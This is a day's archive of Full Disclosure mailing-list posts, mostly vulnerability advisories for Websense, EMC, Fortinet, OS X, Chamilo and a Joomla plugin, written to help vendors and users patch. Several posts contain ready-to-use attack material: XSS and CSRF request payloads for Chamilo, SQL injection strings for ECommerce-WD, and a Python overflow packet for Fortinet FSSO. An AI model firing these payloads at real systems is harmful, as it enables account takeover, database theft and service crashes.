Re: [FD] Multiple Buffer Overflows in Diagnostic Troubleshooting Wizard - msdt.exe - Win 8.0 Pro - x64

2015-03-18 Thread jericho


relevent to your 'buffer overflow' posts that are not real issues:

http://blogs.technet.com/b/markrussinovich/archive/2005/05/17/buffer-overflows.aspx

http://superuser.com/questions/491597/process-monitor-entrys-with-buffer-overflow



___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/


[FD] Websense Email Security vulnerable to persistent Cross-Site Scripting in audit log details view

2015-03-18 Thread Securify B.V.


Websense Email Security vulnerable to persistent Cross-Site Scripting in
audit log details view

Han Sahin, September 2014


Abstract

Users of Websense Data Security that are reviewing DLP incidents can be
attacked via Cross-Site Scripting. This issue can be exploited using a
specially crafted email, or by sending a specially crafted HTTP request
through the Websense proxy. The attacker-supplied code can perform a
wide variety of attacks, such as stealing session tokens, login
credentials, performing arbitrary actions as victims, or logging
victims' keystrokes.


Tested versions

This issue was discovered on Websense Triton v7.8.3 and Websense
appliance modules V-Series v7.7. Other versions may be affected as well.


Fix

This issue is resolved in TRITON APX Version 8.0. More information about
the fixed can be found at the following location:
http://www.websense.com/support/article/kbarticle/Vulnerabilities-resolved-in-TRITON-APX-Version-8-0


Details

https://www.securify.nl/advisory/SFY20140905/websense_email_security_vulnerable_to_persistent_cross_site_scripting_in_audit_log_details_view.html

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/


[FD] Command injection vulnerability in network diagnostics tool of Websense Appliance Manager

2015-03-18 Thread Securify B.V.


Command injection vulnerability in network diagnostics tool of Websense
Appliance Manager

Han Sahin, September 2014


Abstract

A command injection vulnerability was found in Websense Appliance
Manager that allows an attacker to execute arbitrary code on the
appliance. This issue can be combined with other vulnerabilities, like
Cross-Site Scripting, to perform a remote unauthenticated attacks to
compromise the appliance.


Tested versions

This issue was discovered on Websense Triton v7.8.3 and Websense
appliance modules V-Series v7.7. Other versions may be affected as well.


Fix

Websense released hotfix 02 for Websense Triton v7.8.4 in which this
issue is fixed. More information about this hotfix can be found at the
following location:
http://www.websense.com/support/article/kbarticle/v7-8-4-About-Hotfix-02-for-Web-Security-Solutions

This issue is resolved in TRITON APX Version 8.0. More information about
the fixed can be found at the following location:
http://www.websense.com/support/article/kbarticle/Vulnerabilities-resolved-in-TRITON-APX-Version-8-0


Details

https://www.securify.nl/advisory/SFY20140906/command_injection_vulnerability_in_network_diagnostics_tool_of_websense_appliance_manager.html

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/


[FD] Cross-Site Scripting vulnerability in Websense Explorer report scheduler

2015-03-18 Thread Securify B.V.


Cross-Site Scripting vulnerability in Websense Explorer report scheduler

Han Sahin, September 2014


Abstract

It was discovered that the report scheduler of Websense Explorer is
vulnerable to Cross-Site Scripting. Cross-Site Scripting allows an
attacker to perform a wide variety of actions, such as stealing the
victim's session token or login credentials, performing arbitrary
actions on the victim's behalf, and logging their keystrokes.


Tested versions

This issue was discovered on Websense Triton v7.8.3 and Websense
appliance modules V-Series v7.7. Other versions may be affected as well.


Fix

Websense released hotfix 02 for Websense Triton v7.8.4 in which this
issue is fixed. More information about this hotfix can be found at the
following location:
http://www.websense.com/support/article/kbarticle/v7-8-4-About-Hotfix-02-for-Web-Security-Solutions

This issue is resolved in TRITON APX Version 8.0. More information about
the fixed can be found at the following location:
http://www.websense.com/support/article/kbarticle/Vulnerabilities-resolved-in-TRITON-APX-Version-8-0


Details

https://www.securify.nl/advisory/SFY20140911/cross_site_scripting_vulnerability_in_websense_explorer_report_scheduler.html

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/


[FD] Source code disclosure of Websense Triton JSP files via double quote character

2015-03-18 Thread Securify B.V.


Source code disclosure of Websense Triton JSP files via double quote
character

Han Sahin, September 2014


Abstract

Websense Triton is affected by a source code disclosure vulnerability.
By appending a double quote character after JSP URLs, Websense will
return the source code of the JSP instead of executing the JSP. An
attacker can use this issue to inspect parts of Websense's source code
in order to gain more knowledge about Websense's internals.


Tested versions

This issue was discovered on Websense Triton v7.8.3 and Websense
appliance modules V-Series v7.7. Other versions may be affected as well.


Fix

Websense released hotfix 02 for Websense Triton v7.8.4 in which this
issue is fixed. More information about this hotfix can be found at the
following location:
http://www.websense.com/support/article/kbarticle/v7-8-4-About-Hotfix-02-for-Web-Security-Solutions

This issue is resolved in TRITON APX Version 8.0. More information about
the fixed can be found at the following location:
http://www.websense.com/support/article/kbarticle/Vulnerabilities-resolved-in-TRITON-APX-Version-8-0


Details

httpa://www.securify.nl/advisory/SFY20140907/source_code_disclosure_of_websense_triton_jsp_files_via_double_quote_character.html

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/


[FD] Missing access control on Websense Explorer web folder

2015-03-18 Thread Securify B.V.


Missing access control on Websense Explorer web folder

Han Sahin, September 2014


Abstract

It was discovered that no access control is enforced on the explorer_wse
path, which is exposed through the web server. An attacker can abuse
this issue to download any file exposed by this path, including security
reports and Websense Explorer configuration files.


Tested versions

This issue was discovered on Websense Triton v7.8.3 and Websense
appliance modules V-Series v7.7. Other versions may be affected as well.


Fix

This issue is resolved in TRITON APX Version 8.0. More information about
the fixed can be found at the following location:
http://www.websense.com/support/article/kbarticle/Vulnerabilities-resolved-in-TRITON-APX-Version-8-0


Details

https://www.securify.nl/advisory/SFY20140909/missing_access_control_on_websense_explorer_web_folder.html

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/


[FD] Websense Data Security DLP incident Forensics Preview is vulnerable to Cross-Site Scripting

2015-03-18 Thread Securify B.V.


Websense Data Security DLP incident Forensics Preview is vulnerable to
Cross-Site Scripting

Han Sahin, September 2014


Abstract

Users of Websense Data Security that are reviewing DLP incidents can be
attacked via Cross-Site Scripting. This issue can be exploited using a
specially crafted email, or by sending a specially crafted HTTP request
through the Websense proxy. The attacker-supplied code can perform a
wide variety of attacks, such as stealing session tokens, login
credentials, performing arbitrary actions as victims, or logging
victims' keystrokes.


Tested versions

This issue was discovered on Websense Triton v7.8.3 and Websense
appliance modules V-Series v7.7. Other versions may be affected as well.


Fix

Websense created a workaround to address this issue. System - Reporting
- Secure forensics with plain-text

A permanent fix will be included in Websense TRITON APX version 8.1,
scheduled to be release in August, 2015.


Details

https://www.securify.nl/advisory/SFY20140904/websense_data_security_dlp_incident_forensics_preview_is_vulnerable_to_cross_site_scripting.html

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/


[FD] Upcoming new OpenSSL version with high severity security issues

2015-03-18 Thread Patrik Kernstock

Hi,

to just let you know: There is a new OpenSSL version upcoming in about
two days with some fixed security issues with the severity high:

The OpenSSL project team would like to announce the forthcoming release
of OpenSSL versions 1.0.2a, 1.0.1m, 1.0.0r and 0.9.8zf.

These releases will be made available on 19th March. They will fix a
number of security defects. The highest severity defect fixed by these
releases is classified as high severity.

Source is the official OpenSSL announce mailing list:
https://mta.openssl.org/pipermail/openssl-announce/2015-March/20.html

Best regards,
Patrik

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/


[FD] Mac OS X 10.10.2 kernel extension heap overflow resulting in LPE

2015-03-18 Thread Luca Todesco
Hello,

I have recently found an exploitable heap overflow in a core OS X driver.
Particularly, the injectString function is vulnerable to an heap overflow and 
can be triggered without privileges of any kind.


The vulnerable function can be seen at 
http://opensource.apple.com/source/IOHIDFamily/IOHIDFamily-503.200.2/IOHIDSystem/IOHIDSecurePromptClient.cpp


I wrote a weaponized poc at http://github.com/kpwn/vpwn.


The KASLR leak included is not reliable across macs. It works only on Macs with 
AMD (no FirePro) GPUs. (Tested on a last gen 5K Retina iMac). 
It was the only one I'd sacrifice for a public PoC because of that constraint.
It's disabled by default too, but it's trivial to enable it by editing 
lsym_priv.h.


It does not completely clean up it's own mess, so running ioreg after running 
the PoC will likely crash your box. 


The particular IOKit service has been involved in a CVE in October. It had 
functions that could literally not be used without crashing the kernel. 
There still are other unsafe functions in that very same file. Apple has 
disabled the service in particular on the latest 10.10.3 beta possible due to 
those other bugs. I do not believe they are aware of this issue in particular. 
But this is pure speculation, and it doesn't matter in the end, since the 
vulnerability cannot be triggered anymore.


Let me know what you think and sorry for the wall of text,
Luca Todesco.
-qwertyoruiop

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/

[FD] Mac OS X 10.10.2 IOHIDFamily.kext IOHIDSecurePromptClient Heap Overflow

2015-03-18 Thread info
Hello,

I have recently found an exploitable heap overflow in a core OS X driver.
Particularly, the injectString function is vulnerable to an heap overflow and 
can be triggered without privileges of any kind.

The vulnerable function can be seen at 
http://opensource.apple.com/source/IOHIDFamily/IOHIDFamily-503.200.2/IOHIDSystem/IOHIDSecurePromptClient.cpp

I wrote a weaponized poc at http://github.com/kpwn/vpwn.

The KASLR leak is not reliable. It works only on Macs with AMD (no FirePro) 
GPUs. (Tested on a last gen 5K Retina iMac).
It was the only one I'd sacrifice for a public PoC because of that constraint.

It does not completely clean up it's own mess, so running ioreg after running 
the PoC will likely crash your box. 

The particular IOKit service has been involved in a CVE in October. It had 
functions that could literally not be used without crashing the kernel. 
There still are other unsafe functions in that very same file. Apple has 
disabled the service in particular on the latest 10.10.3 beta possible due to 
those other bugs. I do not believe they are aware of this issue in particular. 
But this is pure speculation, and it doesn't matter in the end, since the 
vulnerability cannot be triggered anymore.

Let me know what you think,
Luca Todesco.
-qwertyoruiop

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/


[FD] Chamilo LMS 1.9.10 Multiple XSS CSRF Vulnerabilities

2015-03-18 Thread Rehan Ahmed
I. Overview 
 
Chamilo LMS 1.9.10 or prior versions are prone to a multiple Cross-Site 
Scripting (Stored + Reflected)  CSRF vulnerabilities. These vulnerabilities 
allows an attacker to gain control over valid user accounts in LMS, perform 
operations on their behalf, redirect them to malicious sites, steal their 
credentials, and more. 

II. Severity 
 
Rating: High 
Remote: Yes 
Authentication Require: Yes 
CVE-ID: 

III. Vendor's Description of Application 
 
Chamilo LMS, or Chamilo Learning Management System is a piece of software that 
allows you to create a virtual campus for the provision of online or 
semi-online training. It is distributed under the GNU/GPLv3+ license and its 
development process is public. All the Chamilo software products are entirely 
free (as in freedom), free (as in beer) and complete, and are production-ready 
without requiring any type of payment. 

https://chamilo.org/chamilo-lms/ 

IV. Vulnerability Details  Exploit 
 
1) Multiple Reflected XSS Request 

Request Method = GET 

XSS PoC's:- 

/main/calendar/agenda_list.php?type=personal%27%20onmouseover=%27confirm%280%29%27/%3E%3C!--
/main/messages/outbox.php?f=social+onmouseover=confirm(0)
/main/mySpace/student.php?keyword=31337+onmouseover=confirm(0)//active=0_qf__search_user=submit=Search
/main/inc/lib/fckeditor/editor/plugins/ajaxfilemanager/ajax_get_file_listing.php?editor=stand_aloneview=thumbnailsearch=1search_name=adminsearch_recursively=0search_mtime_from=search_mtime_to=search_folder=;/scriptscriptconfirm(0)/script
/main/admin/configure_extensions.php?display=/scriptscriptconfirm(0)/script
/main/admin/course_category.php?action=addcategory=/scriptconfirm(0)/script
/main/admin/session_edit.php?page=resume_session.php%22%20onmouseover=confirm%280%29//id=1

b) User Agent Header XSS (Reflected)
GET /main/admin/system_status.php?section=webserver
User-Agent: scriptconfirm(0)/script
__ 

2) Stored XSS 

File Attachment Description parameter (legend[]) is vulnerable to Stored XSS By 
utilizing social network an attacker may send a crafted message to anybody 
with XSS payload in the file attachment description field (i.e legend[]) 

Request Method : POST 
Location = /main/messages/new_message.php?f=social 
Parameter = legend[] 

Stored XSS PoC :- 

POST /main/messages/new_message.php?f=social HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0)
Gecko/20100101 Firefox/36.0
Accept: text/html,application/xhtml
+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/main/messages/new_message.php?f=social
Cookie: XX
Connection: keep-alive
Content-Type: multipart/form-data;
boundary=---8461144986726
Content-Length: 1023
-8461144986726
Content-Disposition: form-data; name=users[]
3
-8461144986726
Content-Disposition: form-data; name=title
Stored XSS Test Via Social network
-8461144986726
Content-Disposition: form-data; name=content
This is test messageBR
-8461144986726
Content-Disposition: form-data; name=attach_1; filename=test.txt
Content-Type: text/plain
I owned you 
-8461144986726
Content-Disposition: form-data; name=legend[]
Cool File scriptconfirm(0)/script
-8461144986726
Content-Disposition: form-data; name=compose

-8461144986726
Content-Disposition: form-data; name=_qf__compose_message

-8461144986726
Content-Disposition: form-data; name=sec_token
42917ca29da38f60d49bbaf2ba89b1b9
-8461144986726--
 

3) CSRF  Stored XSS Request 

Method = POST 
Location = /main/admin/session_add.php 
Parameter = name 

POST /main/admin/session_add.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0)
Gecko/20100101 Firefox/36.0
Accept: text/html,application/xhtml
+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1//main/admin/session_add.php
Cookie:XX
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 231

formSent=1name=scriptconfirm(0)/scriptcoach_username=rehansession_category=0nb_days_acess_before=0nb_days_acess_after=0start_limit=onday_start=2month_start=3year_start=2015end_limit=onday_end=2month_end=3year_end=2016session_visibility=2

CSRF PoC:-

html
!-- CSRF Request With Stored XSS Payload --
body
form 

[FD] Web-Dorado ECommerce-WD for Joomla plugin multiple unauthenticated SQL injections

2015-03-18 Thread Brandon Perry
Version 1.2.5 of the ECommerce-WD plugin for Joomla! has multiple
unauthenticated SQL injections available via the advanced search
functionality.

http://extensions.joomla.org/extension/ecommerce-wd

The vulnerable parameters are search_category_id, sort_order, and
filter_manufacturer_ids within the following request:

POST
/index.php?option=com_ecommercewdcontroller=productstask=displayproducts
HTTP/1.1
Host: 172.31.16.49
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko/20100101
Firefox/30.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer:
http://172.31.16.49/index.php?option=com_ecommercewdview=productslayout=displayproductsItemid=120
Cookie: 78fdafa5595397a1fc885bb2f0d74010=q1q1ud2sr0la18o5b38mkbdak2
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 321

product_id=product_count=product_parameters_json=search_name=search_category_id=filter_filters_opened=1filter_manufacturer_ids=1filter_price_from=filter_price_to=filter_date_added_range=0filter_minimum_rating=0filter_tags=arrangement=thumbssort_by=sort_order=ascpagination_limit_start=0pagination_limit=12


Vectors:

Parameter: filter_manufacturer_ids (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload:
product_id=product_count=product_parameters_json=search_name=search_category_id=1filter_filters_opened=1filter_manufacturer_ids=1)
AND 8066=8066 AND
(7678=7678filter_price_from=filter_price_to=filter_date_added_range=0filter_minimum_rating=0filter_tags=arrangement=thumbssort_by=sort_order=ascpagination_limit_start=0pagination_limit=12

Type: error-based
Title: MySQL = 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP
BY clause
Payload:
product_id=product_count=product_parameters_json=search_name=search_category_id=1filter_filters_opened=1filter_manufacturer_ids=1)
AND (SELECT 7197 FROM(SELECT COUNT(*),CONCAT(0x71786a6b71,(SELECT
(ELT(7197=7197,1))),0x71706a6a71,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND
(1212=1212filter_price_from=filter_price_to=filter_date_added_range=0filter_minimum_rating=0filter_tags=arrangement=thumbssort_by=sort_order=ascpagination_limit_start=0pagination_limit=12

Type: AND/OR time-based blind
Title: MySQL  5.0.11 AND time-based blind (SELECT)
Payload:
product_id=product_count=product_parameters_json=search_name=search_category_id=1filter_filters_opened=1filter_manufacturer_ids=1)
AND (SELECT * FROM (SELECT(SLEEP(5)))SrXu) AND
(1480=1480filter_price_from=filter_price_to=filter_date_added_range=0filter_minimum_rating=0filter_tags=arrangement=thumbssort_by=sort_order=ascpagination_limit_start=0pagination_limit=12



Parameter: search_category_id (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload:
product_id=product_count=product_parameters_json=search_name=search_category_id=1)
AND 3039=3039 AND
(6271=6271filter_filters_opened=1filter_manufacturer_ids=1filter_price_from=filter_price_to=filter_date_added_range=0filter_minimum_rating=0filter_tags=arrangement=thumbssort_by=sort_order=ascpagination_limit_start=0pagination_limit=12

Type: error-based
Title: MySQL = 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP
BY clause
Payload:
product_id=product_count=product_parameters_json=search_name=search_category_id=1)
AND (SELECT 5158 FROM(SELECT COUNT(*),CONCAT(0x71786a6b71,(SELECT
(ELT(5158=5158,1))),0x71706a6a71,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND
(8257=8257filter_filters_opened=1filter_manufacturer_ids=1filter_price_from=filter_price_to=filter_date_added_range=0filter_minimum_rating=0filter_tags=arrangement=thumbssort_by=sort_order=ascpagination_limit_start=0pagination_limit=12

Type: AND/OR time-based blind
Title: MySQL  5.0.11 AND time-based blind (SELECT)
Payload:
product_id=product_count=product_parameters_json=search_name=search_category_id=1)
AND (SELECT * FROM (SELECT(SLEEP(5)))AUWc) AND
(1251=1251filter_filters_opened=1filter_manufacturer_ids=1filter_price_from=filter_price_to=filter_date_added_range=0filter_minimum_rating=0filter_tags=arrangement=thumbssort_by=sort_order=ascpagination_limit_start=0pagination_limit=12

Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload:
product_id=product_count=product_parameters_json=search_name=search_category_id=1)
UNION ALL SELECT CONCAT(0x71786a6b71,0x704f43796c4773545349,0x71706a6a71)--
filter_filters_opened=1filter_manufacturer_ids=1filter_price_from=filter_price_to=filter_date_added_range=0filter_minimum_rating=0filter_tags=arrangement=thumbssort_by=sort_order=ascpagination_limit_start=0pagination_limit=12



Parameter: sort_order (POST)
Type: boolean-based blind
Title: MySQL = 5.0 boolean-based blind - ORDER BY, GROUP BY clause
Payload:

Re: [FD] Regarding how can I request a CVE number?

2015-03-18 Thread James Hooker
Hi XZ,

I managed to get a number of CVEs last year, but towards the end of the
year they simply stopped replying, so I've given up. Whether they stopped
replying due to work load, or whether my submissions were not up to their
requirements I'm not sure.

If you find out any more, I'd be interested in knowing why they've stopped
assigning CVEs to certain submission sources.

Kind regards,
James H

On Tue, Mar 17, 2015 at 11:25 PM, XiaopengZhang tfr...@yeah.net wrote:

 Hi Guys,

 I discovered several Vuls and have reported them to the vendors, so I'd
 like to request the CVE for them.(The vendor did not want to request CVE)

 I ever sent some emails to cve-ass...@mitre.org for applying for CVE.
 But so far still nobody replys them. I dont know what happend about this
 email box.
 Is my email recognised as spam? Or do I need write the email content in a
 special format?

 So please, can somebody here help me?
 Thanks

 Best wishes,
 XZ

 ___
 Sent through the Full Disclosure mailing list
 https://nmap.org/mailman/listinfo/fulldisclosure
 Web Archives  RSS: http://seclists.org/fulldisclosure/


___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/


[FD] Multiple Cross-Site Scripting vulnerabilities in Websense Reporting

2015-03-18 Thread Securify B.V.


Multiple Cross-Site Scripting vulnerabilities in Websense Reporting

Han Sahin, September 2014


Abstract

It has been found that Websense Reporting is affected by multiple
Cross-Site Scripting issues. Cross-Site Scripting allows an attacker to
perform a wide variety of actions, such as stealing the victim's session
token or login credentials, performing arbitrary actions on the victim's
behalf, and logging their keystrokes.


Tested versions

This issue was discovered on Websense Triton v7.8.3 and Websense
appliance modules V-Series v7.7. Other versions may be affected as well.


Fix

Websense released hotfix 02 for Websense Triton v7.8.4 in which this
issue is fixed. More information about this hotfix can be found at the
following location:
http://www.websense.com/support/article/kbarticle/v7-8-4-About-Hotfix-02-for-Web-Security-Solutions

This issue is resolved in TRITON APX Version 8.0. More information about
the fixed can be found at the following location:
http://www.websense.com/support/article/kbarticle/Vulnerabilities-resolved-in-TRITON-APX-Version-8-0


Details

https://www.securify.nl/advisory/SFY20140914/multiple_cross_site_scripting_vulnerabilities_in_websense_reporting.html

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/


[FD] [CORE-2015-0006] - Fortinet Single Sign On Stack Overflow

2015-03-18 Thread CORE Advisories Team
1. Advisory Information


Title: Fortinet Single Sign On Stack Overflow
Advisory ID: CORE-2015-0006
Advisory URL: 
http://www.coresecurity.com/advisories/fortinet-single-sign-on-stack-overflow
Date published: 2015-03-18
Date of last update: 2015-03-18
Vendors contacted: Fortinet
Release mode: Coordinated release


2. Vulnerability Information


Class: Stack-based Buffer Overflow [CWE-121]
Impact: Code execution
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2015-2281

 

3. Vulnerability Description


Through Fortniet [1] Single Sign On or Single User Sign On users logged on 
to a computer network are authenticated for access to network resources through 
the FortiGate unit without having to enter their username and password again. 
Fortinet Single Sign On (FSSO) provides Single Sign On capability for Microsoft 
Windows networks using either Active Directory or NTLM authentication and 
Novell networks, using eDirectory.

FSSO [4] monitors user logons and sends the FortiGate unit the username, IP 
address, and the list of Windows AD user groups to which the user belongs. When 
the user tries to access network resources, the FortiGate unit selects the 
appropriate security policy for the destination. If the user belongs to one of 
the permitted user groups, the connection is allowed.

There is a vulnerability in the message dispatcher used by FSSO Windows Active 
Directory and FSSO Novell eDirectory. Exploitation of this vulnerability might 
lead to a full network compromise.


4. Vulnerable packages


 - FSSO Windows Active Directory 4.3.0161 (4.3.0151, 4.3.0129 were also tested 
and found vulnerable)
 - FSSO Novell eDirectory 4.3.0161

Other versions are probably affected too, but they were not checked.


5. Vendor Information, Solutions and Workarounds


Core Security recommends those affected use third party software such as 
Sentinel [3] or EMET [2] that could help to prevent the exploitation of 
affected systems to some extent.

Fortinet published the following FortiGuard Bulletin: [5]


6. Credits


This vulnerability was discovered and researched by Enrique Nissim in 
collaboration with Andres Lopez Luksenberg, both from the Core Security Exploit 
Writing Team. The publication of this advisory was coordinated by Joaquín 
Rodríguez Varela from Core Security Advisories Team.

 

7. Technical Description / Proof of Concept Code


[CVE-2015-2281] The vulnerability in both cases can be exploited by sending a 
special packet to the services without being authenticated (pre-auth).

Given that both software systems require and Administrative account in order to 
run, (Windows Domain Admin or eDirectory Admin accordingly) the full network is 
exposed. Pre-authenticated Remote Code Execution with Domain Administrative 
rights is possible.

The vulnerability is located in the Message Dispatcher for message 
PROCESS_HELLO. Here is a PoC (Proof of Concept) that causes the application 
thread with the FortiGate appliance to crash:

 
import socket
import struct

TARGET_IP = 192.168.233.100

def play():   

message = \x80\x01\x42\x42   
buff = A*248
buff += B * (0xf - len(buff))
payload = struct.pack(I, 0x000f) + message + buff

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((TARGET_IP, 8000))
s.send(payload)
buff_recv = s.recv(6000)
print buff_recv
s.close()   

play()
 

8. Report Timeline


2015-01-07: Core Security notifies Fortinet of the vulnerabilities. Publication 
date is set for February 2nd, 2015.
2015-01-09: Fortinet requests a copy of the advisory draft.
2015-01-09: Core Security sends a draft copy of the advisory to the vendor.
2015-01-14: Fortinet informs they are in the process of validating the report 
and asks if we want to commit to responsible disclosure.
2015-01-14: Core Security informs the vendor that our policy is to publish our 
findings in order to help the users to gain awareness of the issues and 
therefore allowing them to take the necessary precautions to protect 
themselves. We informed them that we always try to release our findings in a 
coordinate manner provided that the time the vendor takes to test and fix the 
issue is reasonable and the publication of this solution and our disclosure is 
agreed between the two parties.
2015-01-21: Core Security asks the vendor if they were able to review the 
vulnerabilities and a tentative date for publishing the fix and consequently 
the advisory.
2015-01-27: Fortinet acknowledges the vulnerabilities and informs that a fix of 
the source code is in order. The say they'll keep us updated regarding the 
release schedule.
2015-02-24: Fortinet informed us that the current ETA was the first week of 
March, but that it could be changed depending on their engineering load.
2015-02-24: Core Security requested a specific date considering that the first 
week of March was next week.
2015-02-27: Fortinet informed us that they currently don't have a fixed date. 

[FD] Command injection vulnerability in EMC Secure Remote Services Virtual Edition

2015-03-18 Thread Securify B.V.


Command injection vulnerability in EMC Secure Remote Services Virtual
Edition

Han Sahin, November 2014


Abstract

A command injection vulnerability was found in EMC Secure Remote
Services Virtual Edition (ESRS VE) that allows an attacker to execute
arbitrary system commands and take full control over ESRS VE.


Affected versions

EMC reports that the following versions are affected by this
vulnerability:

- EMC Secure Remote Services Virtual Edition 3.02
- EMC Secure Remote Services Virtual Edition 3.03


See also

- CVE-2015-0525
- ESA-2015-040: EMC Secure Remote Services Virtual Edition Security
Update for Multiple Vulnerabilities


Fix

EMC released EMC Secure Remote Services Virtual Edition 3.04 that
resolves this vulnerability. Registered EMC Online Support customers can
download patches and software from support.emc.com at:

EMC Secure Remote Services - EMC Secure Remote Services Virtual Edition
- Downloads


Details

https://www.securify.nl/advisory/SFY20141112/command_injection_vulnerability_in_emc_secure_remote_services_virtual_edition.html

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/


[FD] EMC MR (Watch4net) data storage collector credentials are not properly protected

2015-03-18 Thread Securify B.V.


EMC MR (Watch4net) data storage collector credentials are not properly
protected

Han Sahin, November 2014


Abstract

It was discovered that EMC MR (Watch4net) credentials of remote servers
stored in Watch4net are encrypted using a fixed hardcoded password. If
an attacker manages to obtain a copy of the encrypted credentials, it is
trivial to decrypt them.


Affected products

EMC reports that the following products are affected by this
vulnerability:

- EMC MR (Watch4Net) versions prior 6.5u1
- EMC ViPR SRM versions prior to 3.6.1


See also

- CVE-2015-0514
- ESA-2015-004: EMC MR (Watch4Net) Multiple Vulnerabilities


Fix

EMC released the following updated versions that resolve this
vulnerability:

- EMC MR (Watch4Net) 6.5u1
- EMC ViPR SRM 3.6.1

Registered customers can download upgraded software from support.emc.com
at https://support.emc.com/downloads/34247_ViPR-SRM.


Details

https://www.securify.nl/advisory/SFY20141101/emc_m_r__watch4net__data_storage_collector_credentials_are_not_properly_protected.html

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/


[FD] Cross-Site Scripting vulnerability in EMC MR (Watch4net) Web Portal Report Favorites

2015-03-18 Thread Securify B.V.


Cross-Site Scripting vulnerability in EMC MR (Watch4net) Web Portal
Report Favorites

Han Sahin, November 2014


Abstract

A Cross-Site Scripting vulnerability was found in EMC MR (Watch4net)
Web Portal. This issue allows attackers to replace the report that is
shown at startup, the attackers payload will be stored in the user's
profile and will be executed  every time the victim logs in. The
attacker-supplied code can perform a wide variety of actions, such as
stealing victims' session tokens or login credentials, performing
arbitrary actions on their behalf, logging their keystrokes, or exploit
issues in other areas of Watch4net.


Affected products

EMC reports that the following products are affected by this
vulnerability:

- EMC MR (Watch4Net) versions prior 6.5u1
- EMC ViPR SRM versions prior to 3.6.1


See also

- CVE-2015-0513
- ESA-2015-004: EMC MR (Watch4Net) Multiple Vulnerabilities


Fix

EMC released the following updated versions that resolve this
vulnerability:

- EMC MR (Watch4Net) 6.5u1
- EMC ViPR SRM 3.6.1

Registered customers can download upgraded software from support.emc.com
at https://support.emc.com/downloads/34247_ViPR-SRM.


Details

https://www.securify.nl/advisory/SFY20141102/cross_site_scripting_vulnerability_in_emc_m_r__watch4net__web_portal_report_favorites.html

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/


[FD] Cross-Site Scripting vulnerability in EMC MR (Watch4net) Centralized Management Console

2015-03-18 Thread Securify B.V.


Cross-Site Scripting vulnerability in EMC MR (Watch4net) Centralized
Management Console

Han Sahin, November 2014


Abstract

A Cross-Site Scripting vulnerability was found in EMC MR (Watch4net)
Centralized Management Console. This issue allows attackers to perform a
wide variety of actions, such as stealing victims' session tokens or
login credentials, performing arbitrary actions on their behalf, logging
their keystrokes, or exploit issues in other areas of Watch4net.


Affected products

EMC reports that the following products are affected by this
vulnerability:

- EMC MR (Watch4Net) versions prior 6.5u1
- EMC ViPR SRM versions prior to 3.6.1


See also

- CVE-2015-0513
- ESA-2015-004: EMC MR (Watch4Net) Multiple Vulnerabilities


Fix

EMC released the following updated versions that resolve this
vulnerability:

- EMC MR (Watch4Net) 6.5u1
- EMC ViPR SRM 3.6.1

Registered customers can download upgraded software from support.emc.com
at https://support.emc.com/downloads/34247_ViPR-SRM.


Details

https://www.securify.nl/advisory/SFY20141103/cross_site_scripting_vulnerability_in_emc_m_r__watch4net__centralized_management_console.html

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/


